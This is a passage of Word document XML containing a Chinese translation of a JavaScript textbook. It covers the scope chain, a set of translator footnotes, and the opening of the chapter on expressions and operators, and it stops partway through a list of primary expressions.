        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>全局变量是全局对象的属性，这是在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:t>规范中强制规定的。对于局部变量则没有如此规定，但我们可以想象得到，局部变量当做跟函数调用相关的某个对象的属性。</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScri</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>pt 3</w:t>
      </w:r>
      <w:r>
        <w:t>规范称该对象为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>调用对象</w:t>
      </w:r>
      <w:r>
        <w:t>”(call object)</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>规范称为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>声明上下文对象</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>declarative environment record</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>可以允许使用</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>关键字来引用全局对象，却没有方法可以引</w:t>
      </w:r>
      <w:r>
        <w:t>用局部变量中存放的对象。这种存放局部变量的对象的特有性质，是一种对我们不可见的内部实现。然而，这些局部变量对象存在的观念是非常重要的，我们会在下一节展开讲述。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="3_10_3_Zuo_Yong_Yu_Lian_"/>
      <w:r>
        <w:t>3.10.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　作用域链</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>是基于词法作用域的语言：通过阅读包含变量定义在内的数行源码就能知道变量的作用域。全局变量在程序中始终都是有定义的。局部变量在声明它的函数体内以及其所嵌套的函数内始终是有定义的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果将一个局部变量看做是自定义实现的对象的属性的话，那么可以换个角度来解读变量作用域。每一段</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>代码（全局代码或函</w:t>
      </w:r>
      <w:r>
        <w:t>数）都有一个与之关联的作用域链（</w:t>
      </w:r>
      <w:r>
        <w:t>scope chain</w:t>
      </w:r>
      <w:r>
        <w:t>）。这个作用域链是一个对象列表或者链表，这组对象定义了这段代码</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>作用域中</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的变量。当</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>需要查找变量</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>的值的时候（这个过程称做</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>变量解析</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>variable resolution</w:t>
      </w:r>
      <w:r>
        <w:t>）），它会从链中的第一个对象开始查找，如果这个对象有一个名为</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>的属性，</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>则会直接使用这个属性的值，如果第一个对象中不存在名为</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>的属性，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>会继续查找链上的下一个对象。如果第二个对象依然没有名为</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>的属性，则会继续查找下一个对象，以此类推。如果作用域链上</w:t>
      </w:r>
      <w:r>
        <w:t>没有任何一个对象含有属性</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>，那么就认为这段代码的作用域链上不存在</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>，并最终抛出一个引用错误（</w:t>
      </w:r>
      <w:r>
        <w:t>ReferenceError</w:t>
      </w:r>
      <w:r>
        <w:t>）异常。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的最顶层代码中（也就是不包含在任何函数定义内的代码），作用域链由一个全局对象组成。在不包含嵌套的函数体内，作用域链上有两个对象，第一个是定义函数参数和局部变量的对象，第二个是全局对象。在一个嵌套的函数体内，作用域链上至少有三个对象。理解对象链的创建规则是非常重要的。当定义一个函数时，它实际上保存一个作用域链。当调用这个函数时，它创建一个新的对象来存储它的局部</w:t>
      </w:r>
      <w:r>
        <w:t>变量，并将这个对象添加至保存的那个作用域链上，同时创建一个新的更长的表示函数调用作用域的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>链</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。对于嵌套函数来讲，事情变得更加有趣，每次调用外部函数时，内部函数又会重新定义一遍。因为每次调用外部函数的时候，作用域链都是不同的。内部函数在每次定义的时候都有微妙的差别</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>在每次调用外部函数时，内部函数的代码都是相同的，而且关联这段代码的作用域链也不相同。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>作用域链的概念对于理解</w:t>
      </w:r>
      <w:r>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:t>语句（见</w:t>
      </w:r>
      <w:r>
        <w:t>5.7.1</w:t>
      </w:r>
      <w:r>
        <w:t>节）是非常有帮助的，同样对理解闭包（见</w:t>
      </w:r>
      <w:r>
        <w:t>8.6</w:t>
      </w:r>
      <w:r>
        <w:t>节）的概念也至关重要。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r>
        <w:t>例如</w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>程序员应该很熟悉这种格式，就像他们熟悉双精度（</w:t>
      </w:r>
      <w:r>
        <w:t>double</w:t>
      </w:r>
      <w:r>
        <w:t>）类型一样。在</w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>C++</w:t>
      </w:r>
      <w:r>
        <w:t>的所有现代实现中也都用到了双精度类型。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的真实运行环境中，</w:t>
      </w:r>
      <w:r>
        <w:t>0.3-0.2=0.099 999 999 999 999 98</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[4]</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>基本多语种平面</w:t>
      </w:r>
      <w:r>
        <w:t>”(Basic Multilingual Plane</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>BMP)</w:t>
      </w:r>
      <w:r>
        <w:t>，也称</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>零断面</w:t>
      </w:r>
      <w:r>
        <w:t>”(Plan 0),</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>中的一个编码区段。编码介于</w:t>
      </w:r>
      <w:r>
        <w:t>U+0000</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>U+FFFF</w:t>
      </w:r>
      <w:r>
        <w:t>之间。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[5]</w:t>
      </w:r>
      <w:r>
        <w:t>escape sequence</w:t>
      </w:r>
      <w:r>
        <w:t>译为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>转义序列</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，有时也译成</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>转义字符</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>逃逸符</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>，本节中统一译为</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>转义字符</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[6]</w:t>
      </w:r>
      <w:r>
        <w:t>这里的转换基数是指二进制、八进制、十六进制等。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[7]</w:t>
      </w:r>
      <w:r>
        <w:t>如果指定的参数为</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>，有效数字位数为</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>位。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[8]</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:t>parseInt()</w:t>
      </w:r>
      <w:r>
        <w:t>可以对前缀为</w:t>
      </w:r>
      <w:r>
        <w:t>“0”</w:t>
      </w:r>
      <w:r>
        <w:t>（不能是</w:t>
      </w:r>
      <w:r>
        <w:t>"0x"</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>"0X"</w:t>
      </w:r>
      <w:r>
        <w:t>）的数字做八进制转换。由于其细节没有详细说明，你并无法直接使用</w:t>
      </w:r>
      <w:r>
        <w:t>parseInt()</w:t>
      </w:r>
      <w:r>
        <w:t>来对前缀为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>的值进行解析，除非你明确指出所使用的转换基数！在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:t>parseInt()</w:t>
      </w:r>
      <w:r>
        <w:t>只有在明确传入第二个参数</w:t>
      </w:r>
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t>时才会解析八进制数。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[9]</w:t>
      </w:r>
      <w:r>
        <w:t>这里的原文是</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript-parsable</w:t>
      </w:r>
      <w:r>
        <w:t>，意指可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的方法过滤并再做封装。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[10]</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回一个字符串直接量（作者所说的原始值），</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>将这个字符串转换为数字类型，并返回这个数字。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[11]</w:t>
      </w:r>
      <w:r>
        <w:t>编程语言分为动态（类型）语言和静态（类型）语言，动态类型语言是指在运行期间才去做数据类型检查的语言，也就是说，在用动态类型的语言编程时，永远也不用给任何变量指定数据类型，该语言会在第一次赋值给变量时，在内部将数据类型记录下来。</w:t>
      </w:r>
      <w:r>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Rub</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>就是典型的动态类型语言。静态类型语言与动态类型语言刚好相反，它的数据类型是在编译其间检查的，也就是说在写程序时要声明所有变量的数据类型，</w:t>
      </w:r>
      <w:r>
        <w:t>C/C++</w:t>
      </w:r>
      <w:r>
        <w:t>是静态类型语言的典型代表，其他的静态类型语言还有</w:t>
      </w:r>
      <w:r>
        <w:t>C#</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>JAVA</w:t>
      </w:r>
      <w:r>
        <w:t>等。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para04"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="3Text"/>
        </w:rPr>
        <w:t>[12]</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>声明提前</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>这步操作是在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>引擎的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>预编译</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>时进行的，是在代码开始运行之前，更多细节请阅读相关</w:t>
      </w:r>
      <w:r>
        <w:t>ppt</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:t>http://www.slideshare.net/lijing00333/javascript-engine</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="199" w:after="199"/>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="Di_4Zhang__Biao_Da_Shi_He_Yun_Suan_Fu___"/>
      <w:bookmarkStart w:id="66" w:name="Di_4Zhang__Biao_Da_Shi_He_Yun_Suan_Fu_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>章　表达式和运算符</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>表达式</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>expression</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的一个短语，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解释器会将其计算（</w:t>
      </w:r>
      <w:r>
        <w:t>evaluate</w:t>
      </w:r>
      <w:r>
        <w:t>）出一个结果。程序中的常量是最简单的一类表达式。变量名也是一种简单的表达式，它的值就是赋值给变量的值。复杂表达式是由简单表达式组成的。比如，数组访问表达式是由一个表示数组的表达式、左方括号、一个整数表达式和右方括号构成。它们所组成的新的表达式的运算结果是该数组的特定位置的元素值。同样的，函数调用表达式由一个表示函数对象的表达式和</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>个或多个参数表达式构成。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>将简单表达式组合成复杂表达式最常用的方法就</w:t>
      </w:r>
      <w:r>
        <w:t>是使用运算符（</w:t>
      </w:r>
      <w:r>
        <w:t>operator</w:t>
      </w:r>
      <w:r>
        <w:t>）。运算符按照特定的运算规则对操作数（通常是两个）进行运算，并计算出新值。乘法运算符</w:t>
      </w:r>
      <w:r>
        <w:t>“*”</w:t>
      </w:r>
      <w:r>
        <w:t>是比较简单的例子。表达式</w:t>
      </w:r>
      <w:r>
        <w:t>x*y</w:t>
      </w:r>
      <w:r>
        <w:t>是对两个变量表达式</w:t>
      </w:r>
      <w:r>
        <w:t>x</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>进行运算并得出结果。有时我们更愿意说运算符返回了一个值而不是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>计算</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>出了一个值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本章将讲解所有的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>运算符，同时也讲解不涉及运算符的表达式（比如访问数组元素和函数调用）。如果你熟悉</w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t>语法风格的其他编程语言，你会发现大多数</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>表达式和运算符都似曾相识。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="4_1_Yuan_Shi_Biao_Da_Shi_"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　原始表达式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>最简单的表达式是</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>原始表达式</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>primary expression</w:t>
      </w:r>
      <w:r>
        <w:t>）。原始表达式是表达式的最小单位</w:t>
      </w:r>
      <w:r>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:t>它们不再包含其他表达式。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的原始表达式包含常量或直接量、关键字和变量。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>直接量是直接在程序中出现的常数值。它们看起来像：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>1.23//</w:t>
      </w:r>
      <w:r>
        <w:t>数字直接量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"hello"//</w:t>
      </w:r>
      <w:r>
        <w:t>字符串直接量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>/pattern///</w:t>
      </w:r>
      <w:r>
        <w:t>正则表达式直接量</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>数字直接量的语法在</w:t>
      </w:r>
      <w:r>
        <w:t>3.1</w:t>
      </w:r>
      <w:r>
        <w:t>节已经做了讲解。字符串直接量在</w:t>
      </w:r>
      <w:r>
        <w:t>3.2</w:t>
      </w:r>
      <w:r>
        <w:t>节做了讲解。正则表达式直接量语法在</w:t>
      </w:r>
      <w:r>
        <w:t>3.2.4</w:t>
      </w:r>
      <w:r>
        <w:t>节做了简单介绍，在第</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>章将做专门讲解。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的一些保留</w:t>
      </w:r>
      <w:r>
        <w:t>字构成了原始表达式：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>true//</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个布尔值：真</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>false//</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个布尔值：假</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>null//</w:t>
      </w:r>
      <w:r>
        <w:t>返回一个值：空</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this//</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
